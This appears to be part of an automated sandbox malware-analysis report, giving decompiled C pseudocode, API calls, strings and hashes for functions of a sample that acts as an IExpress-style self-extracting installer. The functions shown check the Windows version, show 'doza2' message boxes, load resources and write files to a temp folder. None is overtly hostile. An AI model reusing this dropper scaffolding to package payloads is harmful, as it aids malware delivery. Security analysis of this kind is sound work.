Instruction Fuzzy Hash: 950192326002286BD720AF659E0CEDB7B7CDB45754F01017AFA49F31D0DA788E558AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004036EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004036EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x408004; // 0x7980a54a
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x408184 = 1;
						 *0x408180 = 1;
						L13:
						 *0x409a40 = _t119;
						L14:
						__eflags =  *0x408a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x408a38 & 0x00000001;
											if(( *0x408a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0040681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E004067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E004028E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x409a40 = _t119;
						 *0x408184 = 1;
						 *0x408180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x409a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x408184 = _t135;
							 *0x408180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E004044B9(0, _t138);
					L66:
					return E00406CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x004036f9
0x00403700
0x0040370c
0x00403716
0x00403718
0x0040371b
0x00403721
0x0040372b
0x0040373d
0x00403745
0x00403746
0x00403746
0x00403749
0x004037ab
0x004037ad
0x004037ae
0x004037b3
0x004037b8
0x004037b8
0x004037bf
0x004037bf
0x004037c5
0x00000000
0x00000000
0x004037cb
0x004037cd
0x00000000
0x00000000
0x004037d5
0x004037db
0x004037e8
0x004037ea
0x004037ea
0x004037ea
0x004037f0
0x004037f6
0x00403805
0x00403817
0x0040382b
0x00403830
0x00403836
0x0040383b
0x0040383d
0x004038eb
0x004038eb
0x004038f2
0x0040390c
0x00403911
0x00403911
0x00403913
0x0040394d
0x0040394d
0x0040394f
0x004038a9
0x004038a9
0x004038b0
0x004038b2
0x004038b9
0x004038bb
0x004038c1
0x00403975
0x004038c7
0x004038de
0x004038e0
0x004038e0
0x0040397b
0x0040397d
0x004039a9
0x0040397f
0x00403982
0x0040398b
0x0040398d
0x0040398f
0x0040399f
0x004039a1
0x00403991
0x00403991
0x00403991
0x0040398f
0x004039af
0x004039b6
0x00403a0f
0x00403a0f
0x00403a11
0x00403a13
0x00403a19
0x00000000
0x004039b8
0x004039b8
0x004039ba
0x00000000
0x00000000
0x004039bc
0x004039bf
0x00000000
0x00000000
0x004039c3
0x004039c9
0x004039ce
0x004039d0
0x004039e3
0x004039e5
0x004039e6
0x004039f1
0x004039f7
0x004039fa
0x00403a01
0x00403a04
0x00000000
0x00000000
0x00403a06
0x00403a09
0x00403a09
0x00403a0b
0x00403a0b
0x00000000
0x00403a09
0x004039fc
0x00000000
0x004039fc
0x004039d3
0x004039d8
0x004039da
0x00000000
0x00000000
0x00000000
0x004039dc
0x004039b6
0x00403955
0x0040395b
0x00000000
0x00000000
0x00403961
0x00403963
0x00000000
0x00000000
0x00403969
0x00403969
0x00000000
0x00403969
0x00403915
0x00403915
0x0040391b
0x0040391f
0x00000000
0x00000000
0x0040392d
0x00403933
0x00403938
0x0040393a
0x00000000
0x00000000
0x00403940
0x00403946
0x0040394b
0x00000000
0x0040394b
0x00000000
0x004038f2
0x00403843
0x00403845
0x00000000
0x00000000
0x0040384b
0x0040384d
0x00403883
0x00403885
0x00000000
0x00000000
0x0040389a
0x0040389e
0x0040389e
0x00000000
0x00000000
0x004038a0
0x004038a0
0x004038a2
0x00000000
0x00000000
0x004038a4
0x00000000
0x004038a4
0x0040384f
0x00403851
0x00403857
0x0040386e
0x00403877
0x0040387b
0x00000000
0x00000000
0x00000000
0x00403881
0x00403859
0x0040385c
0x00403862
0x00403866
0x00000000
0x00000000
0x00403868
0x00000000
0x004038f4
0x004038f4
0x004038f5
0x004038fb
0x00403901
0x00403901
0x00000000
0x0040390a
0x0040374b
0x0040374e
0x0040375c
0x00403764
0x00403769
0x0040376e
0x00403771
0x0040379c
0x0040379f
0x00000000
0x00000000
0x004037a3
0x004037a4
0x00000000
0x004037a4
0x00403773
0x00403777
0x00403778
0x0040377f
0x00403781
0x0040378e
0x0040378e
0x00403794
0x00000000
0x00403794
0x00403783
0x00000000
0x00000000
0x00403785
0x0040378c
0x00000000
0x00000000
0x00000000
0x0040378c
0x00403750
0x00000000
0x0040372d
0x0040372d
0x0040396b
0x0040396b
0x0040396c
0x0040396e
0x0040396f
0x00403a1e
0x00403a1e
0x00403a22
0x00403a27
0x00403a3e
0x00403a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00403723
MessageBeep.USER32(00000000), ref: 004039C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 004039F1

Strings

doza2, xrefs: 004039E9, 00403A19
3, xrefs: 00403785

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
Instruction ID: b81105887f12e35a37dab4eacb44c34be458b82212792c55bce88564180a53cc
Opcode Fuzzy Hash: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
Instruction Fuzzy Hash: EB91E4B1B012149BEB34DF15CD407AA7BA8AB85306F1540BBD989BB2D1D7788F81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00406517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x409a3c; // 0x400000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E004044B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x402ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0040651f
0x0040652a
0x00406534
0x0040656b
0x00406577
0x0040657c
0x0040657c
0x00406536
0x0040653e
0x00406542
0x00000000
0x00406544
0x00406547
0x0040654c
0x00406549
0x00406549
0x00406549
0x0040655e
0x00406560
0x00406569
0x00000000
0x00000000
0x00406569
0x00406542
0x00406587

APIs

FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

Strings

.@, xrefs: 0040657C

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .@
API String ID: 1214682469-2582305824
Opcode ID: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
Instruction ID: b6aca25b56715203ff799519597f98c75816ff70f42a55b2cf7247ba824ed053
Opcode Fuzzy Hash: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
Instruction Fuzzy Hash: DC012672100219BBCB105F69AC08DBB7A6CEB89364F01013AFE01B3290D7758C308AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x408004; // 0x7980a54a
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00401781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0040658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00406CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00406495
0x00406495
0x004064a0
0x004064a7
0x004064ab
0x004064bd
0x004064c2
0x004064d3
0x004064df
0x004064e8
0x00406502
0x004064ee
0x004064f9
0x004064f9
0x00406516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00406502

Strings

advpack.dll, xrefs: 004064C2, 004064CD, 00406501
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004064AC

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-3680919256
Opcode ID: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
Instruction ID: f343e68db0231e3b1b86542e237e673f83042691aa5beef6a9f0cd15a7b4c131
Opcode Fuzzy Hash: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
Instruction Fuzzy Hash: 0F012630A00108ABE710DB60EC49EEE7338DB54314F5001BAF586B21D0CF789E968A09

Uniqueness

Uniqueness Score: -1.00%

Function 00404169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00404169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0040468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0040468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E004044B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0040417d
0x0040418f
0x00404193
0x004041b7
0x004041d3
0x004041e6
0x00000000
0x004041e7
0x004041d5
0x004041d6
0x004041d8
0x004041d9
0x004041da
0x004041df
0x004041e1
0x00000000
0x004041e1
0x004041b9
0x004041ba
0x004041bc
0x004041bd
0x004041be
0x00000000
0x004041be
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004030B4), ref: 00404189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004030B4), ref: 004041E7

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

FINISHMSG, xrefs: 00404173, 004041AB
<None>, xrefs: 004041C5

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
Instruction ID: b70afbfb341dd1e48003f8e01e3fe3506c20631bb83d4641c2337169838dded0
Opcode Fuzzy Hash: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
Instruction Fuzzy Hash: F7018BF53002147BF3252A664C9AF6B218EDBD4799F10413BBB06B52D09ABCCC1141AD

Uniqueness

Uniqueness Score: -1.00%

Function 004019E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x408004; // 0x7980a54a
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E004043D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x409a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00406CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x004019e0
0x004019e0
0x004019eb
0x004019f2
0x004019f9
0x004019fc
0x00401a01
0x00401a2a
0x00401a2e
0x00401a3e
0x00401a4f
0x00401a62
0x00401a6a
0x00000000
0x00401a03
0x00401a06
0x00401a20
0x00401a20
0x00401a08
0x00401a08
0x00401a14
0x00000000
0x00401a16
0x00401a18
0x00401a70
0x00401a72
0x00401a72
0x00401a14
0x00401a06
0x00401a81

APIs

EndDialog.USER32(?,?), ref: 00401A18
GetDesktopWindow.USER32 ref: 00401A24
LoadStringA.USER32(?,?,00000200), ref: 00401A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00401A62
MessageBeep.USER32(000000FF), ref: 00401A6A

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
Instruction ID: 9f07e2b583c3b9e3b689e24bd258bcd44b67705ed80a1d215512c7b4a79a90b1
Opcode Fuzzy Hash: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
Instruction Fuzzy Hash: 381152316012199BDB10EF68DE08AAE77B8EB49310F108175F916B61E1DA349E11DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004063C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x408004; // 0x7980a54a
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00401781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
				E0040658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x409124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x409124 = 0x80070052;
					_t37 = 0;
				}
				return E00406CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x004063cb
0x004063d2
0x004063d8
0x004063ea
0x004063f3
0x00406401
0x00406402
0x00406410
0x00406415
0x00406433
0x00406438
0x00406449
0x00406463
0x0040646d
0x00406477
0x00406477
0x0040647a
0x0040643a
0x0040643a
0x00406444
0x00406444
0x00406492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004063EB

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-305352358
Opcode ID: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
Instruction ID: 9e5926c835beb8d1d737b027b25a5559d0e4d4e7e399f98f9f62a26a88332679
Opcode Fuzzy Hash: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
Instruction Fuzzy Hash: FF21C071A0021CAFDB10DF25DC85FEB7368EB44314F1041BAB985B7290DAB45D958FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004047E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00401680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x4091e0; // 0x4ead3c8
						 *(_t34 + 4) = _t11;
						 *0x4091e0 = _t34;
						return 1;
					}
					_t25 =  *0x408584; // 0x0
					E004044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x408584; // 0x0
				E004044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x004047e8
0x004047f0
0x004047f4
0x0040480f
0x00404811
0x00404814
0x00404814
0x00404816
0x00404817
0x00404829
0x0040482b
0x0040482f
0x0040484f
0x00404852
0x00404855
0x00404855
0x00404857
0x00404858
0x00404860
0x00404865
0x0040486a
0x0040486f
0x00000000
0x00404876
0x00404831
0x00404841
0x00404847
0x0040480b
0x00000000
0x0040480b
0x004047f6
0x00404806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00404E6F), ref: 004047EA
LocalAlloc.KERNEL32(00000040,?), ref: 00404823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00404847

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404851

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-305352358
Opcode ID: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
Instruction ID: f9da94a783bc0005b1bc8c3148c785d844e837b74aa1f48265ffd0ddb08f4ce8
